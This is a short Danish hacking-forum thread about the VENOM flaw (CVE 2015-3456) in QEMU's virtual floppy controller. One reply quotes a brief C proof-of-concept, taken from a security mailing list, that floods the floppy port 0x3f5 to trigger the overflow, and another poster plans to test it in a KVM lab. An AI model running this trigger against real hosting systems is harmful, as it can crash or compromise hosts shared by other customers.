Denne side bruger cookies
Dette forum bruger cookies. Hvis du er registreret, bruges de til at huske hvem du er logget ind som. Hvis ikke, gemmer vi dit sidste besøgstidspunkt. Besøgstidspunktet bruges bl.a. til at holde øje med, hvilke tråde du allerede har læst. Cookies er små tekstdokumenter, som bliver gemt i din browser og udgør ingen sikkerhedsrisiko. Tryk "Mere Information" nedenfor, for en liste over de cookies vi sætter. Du har mulighed for at fravælge cookies ved at klikke på knappen "Blokér Cookies" i bunden af denne boks.

En ikke-personhenførbar cookie vil blive gemt i din browser, uanset dit valg (Medmindre du ikke foretager et). Således undgår du at blive spurgt igen. Du kan til enhver tid ændre dit valg via linket i bunden af siden.

Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
CVE 2015-3456
20-05-2015, 13:53
#1
2015-3456
http://www.zdnet.com/article/venom-secur...tacenters/

Så vidt jeg har læst er den ikke set ”in the wild” endnu, men der er fandenme mange service providers hvor det kunne være aktuelt. Nogen der ved om der er et PoC ude?
Don't learn to hack, hack to learn
Find alle beskeder fra denne bruger
Citer denne besked i et svar
20-05-2015, 17:51
#2
RE: 2015-3456
Citer:#include <sys/io.h>

#define FIFO 0x3f5

int main() {
int i;
iopl(3);

outb(0x0a,0x3f5); /* READ ID */
for (i=0;i<10000000;i++)
outb(0x42,0x3f5); /* push */
}
https://marc.info/?l=oss-security&m=143155206320935&w=2

Har ikke testet, men du kunne eventuelt starte med at prøve på dit eget setup.
Find alle beskeder fra denne bruger
Citer denne besked i et svar
21-05-2015, 13:00
#3
RE: 2015-3456
Kunne være meget spændende, skal lige se om jeg kan få sat noget KVM værk op at teste på...
Don't learn to hack, hack to learn
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)